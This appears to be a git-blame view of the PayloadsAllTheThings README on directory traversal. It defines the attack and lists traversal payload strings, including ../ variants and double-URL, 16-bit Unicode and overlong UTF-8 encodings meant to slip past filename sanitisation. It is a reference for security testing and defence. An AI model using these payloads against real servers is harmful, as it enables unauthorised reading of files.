PayloadsAllTheThings/Traversal directory/README.md

49 lines
787 B
Markdown
Raw Normal View History

2016-10-19 00:51:24 +00:00
# Traversal Directory
2018-08-12 21:30:22 +00:00
A directory traversal consists in exploiting insufficient security validation / sanitization of user-supplied input file names, so that characters representing "traverse to parent directory" are passed through to the file APIs.
2016-10-18 08:01:56 +00:00
2016-10-19 00:51:24 +00:00
## Exploit
2018-08-12 21:30:22 +00:00
Basic
2018-08-12 21:30:22 +00:00
```powershell
2016-10-19 00:51:24 +00:00
../
..\
..\/
%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215
%uff0e%uff0e%u2216
..././
...\.\
2016-10-18 08:01:56 +00:00
```
16 bit Unicode encoding
2018-08-12 21:30:22 +00:00
```powershell
. = %u002e
/ = %u2215
\ = %u2216
```
Double URL encoding
2018-08-12 21:30:22 +00:00
```powershell
. = %252e
/ = %252f
2018-08-12 21:30:22 +00:00
\ = %255c
```
UTF-8 Unicode encoding
2018-08-12 21:30:22 +00:00
```powershell
. = %c0%2e, %e0%40%ae, %c0ae
/ = %c0%af, %e0%80%af, %c0%2f
\ = %c0%5c, %c0%80%5c
```
2018-12-24 14:02:50 +00:00
## References
2018-08-12 21:30:22 +00:00
* [Directory traversal attack - Wikipedia](https://en.wikipedia.org/wiki/Directory_traversal_attack)